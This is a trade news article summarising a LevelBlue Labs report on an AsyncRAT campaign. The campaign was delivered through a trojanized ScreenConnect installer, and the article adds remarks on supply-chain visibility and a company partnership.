LevelBlue Report: Attackers Using AsyncRAT To Steal Credentials

LevelBlue Labs has uncovered a campaign in which hackers are deploying AsyncRAT, a Remote Access Trojan (RAT), through a fileless loader that masquerades as a legitimate tool. The malware is designed to steal user credentials, enable keylogging, and siphon cryptocurrency wallet data.

Weaponizing trusted utilities to evade detection

The RAT was highlighted in LevelBlue Labs’ latest Threat Spotlight. Unlike traditional malware that writes payloads to disk, the security provider noted that fileless threats, such as AsyncRAT, operate in memory, making them harder to detect and remediate. 

The campaign’s initial entry point was a compromised ScreenConnect installer. ScreenConnect is a remote support and access platform that lets IT teams and MSPs connect to end-user devices for remote troubleshooting, maintenance, and IT support.

Here’s how the attack works:

• Attackers gained initial access through a trojanized ScreenConnect installer, then executed a layered VBScript and PowerShell loader to fetch obfuscated payloads.
• Persistence was maintained via a fake “Skype Updater” scheduled task, ensuring re-execution at every login.
• AsyncRAT modules enabled credential theft, keylogging, clipboard hijacking, and wallet reconnaissance while evading detection through AMSI and ETW bypass techniques.

LevelBlue’s researchers warned that malicious actors are increasingly weaponizing trusted tools, such as PowerShell and WScript, to execute undetected attacks and steal sensitive information.

In conclusion, the report emphasized the importance of sharing threat intelligence to keep pace with evolving tactics and malware.

“Sharing these behaviors and techniques with internal teams allows for proactive threat

hunting, enabling defenders to recognize patterns, anticipate attacker evolution, and improve investigative focus — all of which ultimately advance both detection and response capabilities,” the report said.

Proactively managing risks: what organizations need to do to stay secure

In parallel with hackers weaponizing trusted tools in attack campaigns, LevelBlue’s recently released Data Accelerator: Software Supply Chain and Cybersecurity report highlighted a broader trend of inadequate visibility among organizations in managing third-party threats.

The report highlighted the vulnerability of companies to supply chain attacks, with nearly half of surveyed organizations (49%) acknowledging that they lack the necessary visibility to accurately detect and manage risks within their ecosystems.

In response, Theresa Lanowitz, chief evangelist at LevelBlue, advised organizations to apply “security-focused KPIs” to every leader, regardless of their function.

“There has to be some responsibility internally around managing risk, and if everybody has to think about security within their goals, then they’ll naturally start to consider how they interact with third-party tools and what that means for the overall security of the organization,” Lanowitz told Channel Insider in July.

In July, LevelBlue entered a strategic partnership with UK-based channel development firm Kompigo. Read our coverage of the agreement and how it helps expand security services for MSPs and MSSPs within the region.